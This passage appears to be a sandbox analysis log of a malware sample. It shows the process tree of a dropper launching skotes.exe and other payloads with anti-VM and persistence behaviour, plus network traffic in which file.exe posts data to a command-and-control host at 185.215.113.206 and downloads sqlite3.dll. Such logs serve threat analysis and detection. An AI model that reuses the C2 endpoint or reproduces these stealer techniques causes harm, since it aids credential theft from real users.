    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
    3⤵
    PID:4316
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4980
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
    3⤵
    PID:452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:5004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:3644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
    3⤵
    - Uses browser remote debugging
    PID:2476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2
    3⤵
    PID:2992
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,14557790654810483440,15227900392732815227,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:2
    3⤵
    PID:184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsAAFBAKECAE.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3644
- - C:\Users\Admin\DocumentsAAFBAKECAE.exe
    "C:\Users\Admin\DocumentsAAFBAKECAE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1860
    - - C:\Users\Admin\AppData\Local\Temp\1004574001\7134274202.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004574001\7134274202.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3928
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 1488
        6⤵
        Program crash
        
        PID:4876
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 1444
        6⤵
        Program crash
        
        PID:2260
    - - C:\Users\Admin\AppData\Local\Temp\1004575001\cddabe90fb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004575001\cddabe90fb.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2864
    - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2272
    - - C:\Users\Admin\AppData\Local\Temp\1004577001\c51448d082.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004577001\c51448d082.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3928 -ip 3928
1⤵
PID:3148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3928 -ip 3928
1⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3516

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:404

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
GET

http://185.215.113.206/

file.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBGHIIJDGHCBFIECBKEG
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGDBGCBGIDHCBGDHIEBF
Host: 185.215.113.206
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2064
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCB
Host: 185.215.113.206
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEHIJDGIEBKKFHJKJKEG
Host: 185.215.113.206
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFH
Host: 185.215.113.206
Content-Length: 4635
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.215.113.206/746f34465cf17784/sqlite3.dll

file.exe

Remote address:

185.215.113.206:80

Request

GET /746f34465cf17784/sqlite3.dll HTTP/1.1
Host: 185.215.113.206
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

206.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.113.215.185.in-addr.arpa

IN PTR

Response
DNS

71.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

71.159.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CIrwygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

42.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.169.217.172.in-addr.arpa

IN PTR

Response

42.169.217.172.in-addr.arpa

IN PTR

lhr48s08-in-f101e100net
DNS

4.180.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.180.250.142.in-addr.arpa

IN PTR

Response

4.180.250.142.in-addr.arpa

IN PTR

lhr25s32-in-f41e100net
DNS

ogads-pa.googleapis.com

chrome.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.googleapis.com

IN A

Response

ogads-pa.googleapis.com

IN A

142.250.200.42

ogads-pa.googleapis.com

IN A

142.250.180.10

ogads-pa.googleapis.com

IN A

142.250.200.10

ogads-pa.googleapis.com

IN A

172.217.16.234

ogads-pa.googleapis.com

IN A

142.250.187.202

ogads-pa.googleapis.com

IN A

172.217.169.74

ogads-pa.googleapis.com

IN A

142.250.187.234

ogads-pa.googleapis.com

IN A

172.217.169.10

ogads-pa.googleapis.com

IN A

142.250.178.10

ogads-pa.googleapis.com

IN A

142.250.179.234

ogads-pa.googleapis.com

IN A

216.58.213.10

ogads-pa.googleapis.com

IN A

216.58.204.74

ogads-pa.googleapis.com

IN A

216.58.201.106

ogads-pa.googleapis.com

IN A

172.217.169.42
DNS

apis.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

216.58.201.110
OPTIONS

https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

chrome.exe

Remote address:

142.250.200.42:443

Request

OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.googleapis.com
accept: */*
access-control-request-method: POST
access-control-request-headers: content-type,x-goog-api-key,x-user-agent
origin: chrome-untrusted://new-tab-page
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
POST

https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

chrome.exe

Remote address:

142.250.200.42:443

Request

POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
host: ogads-pa.googleapis.com
content-length: 69
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
x-user-agent: grpc-web-javascript/0.1
x-goog-api-key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_E
content-type: application/json+protobuf
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: chrome-untrusted://new-tab-page
x-client-data: CIrwygE=
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0

chrome.exe

Remote address:

216.58.201.110:443

Request

GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/2.0
host: apis.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CIrwygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=SSowFPd2HlBX8qYQBxlrRAZnbCLxVDz-l-oENzyTcr6YtHmAO-2Qy_LYDmq2a-yUolRfeO_UCcTbDCxxcDyMag8V_UTRiGksmPgM3u2LxXXqRlvlQFJxOTs8sh6prK_JklG_IFUiJ5bniqteV-KFp-JeJ4Yf08nQ760I1bABiE20Ey7XoAVQfr7V7wvXvBhAboI
DNS

227.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.187.250.142.in-addr.arpa

IN PTR

Response

227.187.250.142.in-addr.arpa

IN PTR

lhr25s34-in-f31e100net
DNS

42.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.200.250.142.in-addr.arpa

IN PTR

Response

42.200.250.142.in-addr.arpa

IN PTR

lhr48s30-in-f101e100net
DNS

110.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

110.201.58.216.in-addr.arpa

IN PTR

Response

110.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f141e100net

110.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f14�I

110.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f110�I
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.16.238
POST

https://play.google.com/log?format=json&hasfast=true

chrome.exe

Remote address:

172.217.16.238:443

Request

POST /log?format=json&hasfast=true HTTP/2.0
host: play.google.com
content-length: 1434
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
content-type: application/x-www-form-urlencoded;charset=UTF-8
accept: */*
origin: chrome-untrusted://new-tab-page
x-client-data: CIrwygE=
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=SSowFPd2HlBX8qYQBxlrRAZnbCLxVDz-l-oENzyTcr6YtHmAO-2Qy_LYDmq2a-yUolRfeO_UCcTbDCxxcDyMag8V_UTRiGksmPgM3u2LxXXqRlvlQFJxOTs8sh6prK_JklG_IFUiJ5bniqteV-KFp-JeJ4Yf08nQ760I1bABiE20Ey7XoAVQfr7V7wvXvBhAboI
DNS

238.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.16.217.172.in-addr.arpa

IN PTR

Response

238.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f141e100net

238.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f14�I
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

216.58.201.110
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D31%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D31%2526e%253D1

chrome.exe

Remote address:

216.58.201.110:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D31%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D31%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=23.SE=X7ARw7p394OKyiuztOVosCGZYVi0vuwHQ-IozsrOCaR3aQ5lJaUDfzwHYk7iWmKl9W5LEHLSlRGSPa-J2iBeFmG0Km95NcEwaGa-R0Gq8eF8nkPJCRWWuhFNTwT1YBiJZz38r5B0nTxtBH2sTfgIL8BoWZBAXf_-yVcc8SeSAt01E8QMA3rPIgYpQnmmHAVmw-v_qdao
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

216.58.213.1
GET

https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx

chrome.exe

Remote address:

216.58.213.1:443

Request

GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

1.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.213.58.216.in-addr.arpa

IN PTR

Response

1.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f11e100net

1.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f1�F
DNS

241.150.49.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.150.49.20.in-addr.arpa

IN PTR

Response
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFI
Host: 185.215.113.206
Content-Length: 1035
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/6c4adf523b719729.php

file.exe

Remote address:

185.215.113.206:80

Request

POST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJK
Host: 185.215.113.206
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 07 Nov 2024 09:06:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

nw-umwatson.events.data.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

nw-umwatson.events.data.microsoft.com

IN A

Response

nw-umwatson.events.data.microsoft.com

IN CNAME

blobcollector.events.data.trafficmanager.net

blobcollector.events.data.trafficmanager.net

IN CNAME

onedsblobprdcus16.centralus.cloudapp.azure.com

onedsblobprdcus16.centralus.cloudapp.azure.com

IN A

104.208.16.94
POST

https://nw-umwatson.events.data.microsoft.com/Telemetry.Request

msedge.exe

Remote address:

104.208.16.94:443

Request

POST /Telemetry.Request HTTP/1.1
Connection: Keep-Alive
Content-Type: application/xml
User-Agent: Crashpad/0.8.0 WinHTTP/10.0.19041.1151 Windows_NT/10.0.19041.1202 (x64)
